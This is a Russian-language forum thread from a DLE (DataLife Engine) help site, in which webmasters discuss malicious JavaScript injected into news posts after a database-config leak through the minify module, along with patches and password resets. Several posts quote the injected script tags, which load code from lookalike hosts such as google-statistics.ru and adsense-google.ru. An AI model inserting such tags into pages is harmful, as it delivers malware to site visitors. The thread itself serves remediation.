Не нравятся результаты поиска? Попробуйте другой поиск!

DLE FAQ » Все вопросы » Общие вопросы » ( ВИРУСЫ) На своих 5 сайтах заметил вредоносный .js код, как удалить ???

( ВИРУСЫ) На своих 5 сайтах заметил вредоносный .js код, как удалить ???

vlits 26.09.2013 Все вопросы » Общие вопросы 4940

вопрос

Здравствуйте, сегодня на своих сайтах заметил вредоносный код, каким то образом в новости попал код .js
Версия dle 9.8 возможно кто то нашел дырку и размещает код, обновляйтесь на dle 10 и меняйте пароли на админа.

Вид кода такой:

Как почистить весь сайт и удалить данный скрипт ???

Ответил: vlits

ТАК ЧТО РЕБЯТА РЕШАЙТЕ ДЕЛЕМУ, ЭТО НЕ ТОЛЬКО У МЕНЯ, ЭТО МНОГО У КОГО :)
Успел предупредил, ставьте пачик по той ссылке что я написал.
http://dle-news.ru/bags/v10/1580-potencialnaya-ugroza-v-module-minify.html

17 комментариев

Юзер

108

vlits - 2015-05-1226 сентября 2013 17:20 - #17047

чет код не видно было.
--script type="text/javascript" src="___google-statistics.ru/js/75d281aa6b0e43509bb8bf8d6e57ca28.js"></script

Юзер

Trom - 2015-05-1226 сентября 2013 17:26 - #17048

Ищи шелл и поменяй пароль к ftp, но скорее всего пас админа от сайта сбрутили.

Юзер

108

vlits - 2015-05-1226 сентября 2013 17:41 - #17049

по теме, надо ставить пачь, __dle-news.ru/bags/v10/1580-potencialnaya-ugroza-v-module-minify.html

информация об данной проблеме:
если не ставить пачь:

Зато может появится вот такой файлик minify_dbconfig.php.js_5cf6c499f8c1dd51050a5bf6981022a5 в папке кеша engine/cache/system/ который является копией файла настроек движка для доступа к базе данных. И злоумышленник успешно может слить всю базу себе и как бонус очистить все таблицы в ней доставив администратору ресурса массу неприятностей!!!
С появлением новых версий DLE появляются все новые и новые уязвимости которые не всегда есть возможность закрыть вовремя, но вы обязаны их искать и уведомлять своих покупателей о них.
И так, как у данной уязвимости степень опасности высокая - вы должны были прислать письмо на электронную почту, а не обвинять меня в халатности. Да, я не проверил обновлений вовремя, но я по крайней мере не предлагаю обновленную версию движка пользователям не проверив ее предварительно на уязвимости, используя которые злоумышленник может долго трепать нервы администратору сайта!!!

если в dle в админке проверять на вирусы, то находит что то такое, minify_dbconfig.php.js_5cf6c499f8c1dd51050a5bf6981022a5

так что кто то получил данные к бд и через бд в новости распихал вирус )))

ТАК ЧТО РЕБЯТА РЕШАЙТЕ ДЕЛЕМУ, ЭТО НЕ ТОЛЬКО У МЕНЯ, ЭТО МНОГО У КОГО :)
Успел предупредил, ставьте пачик по той ссылке что я написал.
http://dle-news.ru/bags/v10/1580-potencialnaya-ugroza-v-module-minify.html

PHP-developer

3198

dj-avtosh - 2015-05-1226 сентября 2013 19:18 - #17055

За денюшку почищу профессионально) Есть огромный опыт.

По заказам пишем сюда: @Rud00y

ЯД: 41001679231462
Заказы в telegram (ремонт модулей, оптимизация нагрузок и т.п.):
В телегу писать сразу задачу и бюджет.

Юзер

doktorpull - 2015-05-1217 февраля 2014 13:33 - #23711

Сколько возьмешь чтобы сайт вновь стал индекстироваться яндексом

PHP-developer

3198

dj-avtosh - 2015-05-1217 февраля 2014 21:32 - #23728

В icq или skype

Юзер

108

vlits - 2015-05-1227 сентября 2013 04:27 - #17068

Да я и сам справлюсь. есть скрипты различные, предупредил вас ) что бы не наловили говна этого.

Юзер

108

vlits - 2015-05-1227 сентября 2013 05:36 - #17071

пишут что данная заплатка не помогает, так что проблема актуальна !!!
решения вроде бы пока нет.

Юзер

Бахмут - 2015-05-1227 сентября 2013 07:53 - #17073

Ничего подобного! Как только поставил заплатку - у меня сразу проблема исчезла данная.

Юзер

108

vlits - 2015-05-1227 сентября 2013 12:00 - #17077

Если так то хорошо, просто народ пишет что проблема не решилась, по мимо заплатки нужно будет сменить пароль от базы и от админки сайта, но перед этим удалить данный вирус.

Юзер

108

vlits - 2015-05-1227 сентября 2013 14:09 - #17088

Бахмут,
чем чистил бд от вирусов ?

Юзер

1599

FastFud - 2015-05-1227 сентября 2013 14:33 - #17091

Делайте что написано на dle-news.ru

Потом бери базу данных и чисти ее с помощью notepad++ или другого. Восстанови базу и все.

Юзер

108

vlits - 2015-05-1227 сентября 2013 14:44 - #17095

смешно база 40 и 80 метров ) я её не открою это раз )
а тут скрипт есть какой то: http://forum.searchengines.ru/showpost.php?p=12172854&postcount=147

Юзер

1599

FastFud - 2015-05-1227 сентября 2013 14:48 - #17096

Ну тогда так делайте

Юзер

108

vlits - 2015-05-1227 сентября 2013 15:59 - #17104

уже сделал, работает !

Юзер

108

vlits - 2015-05-1228 сентября 2013 13:02 - #17155

У меня после заплатки тоже появился по новой вирусный код в БД. Потом поменял все пароли от админки(если админов несколько - то у всех), базы данных, сервера, FTP, mysql, пользователей БД. Больше скрипт не появлялся и файл minify_dbconfig.php.js по адресу engine/cache/system/ тоже перестал появляться. Так что кому не помогла заплатка - где-то профилонили и не поменяли пароли.

Юзер

108

vlits - 2015-05-1212 ноября 2013 04:54 - #18954

На одном из моих сайтов, опять код новости заметил

<script src="http://adsense-google.ru/js/7230b2b03e2da37352abf1a659545b44.js" async="async" type="text/javascript">

</script>
<script src="http://google-statistics.ru/js/7230b2b03e2da37352abf1a659545b44.js" type="text/javascript" async="async">

</script>

( ВИРУСЫ) На своих 5 сайтах заметил вредоносный .js код, как удалить ???

Ответил: vlits

17 комментариев

Похожие вопросы

Как найти вредоносный код на сайте

Не могу отыскать вредоносный код!

Как найти шелл?

Кеш DLE

Как удалить это...?

Внешние ссылки со страницы регистрации

Помогите удалить вирус

Произошло изменения CMOD папок и .htaccess. В чем может быть дело?

Как удалить все внешние ссылки с текста материалов?

Как найти чужой редирект на сайте на DLE 8.2 ?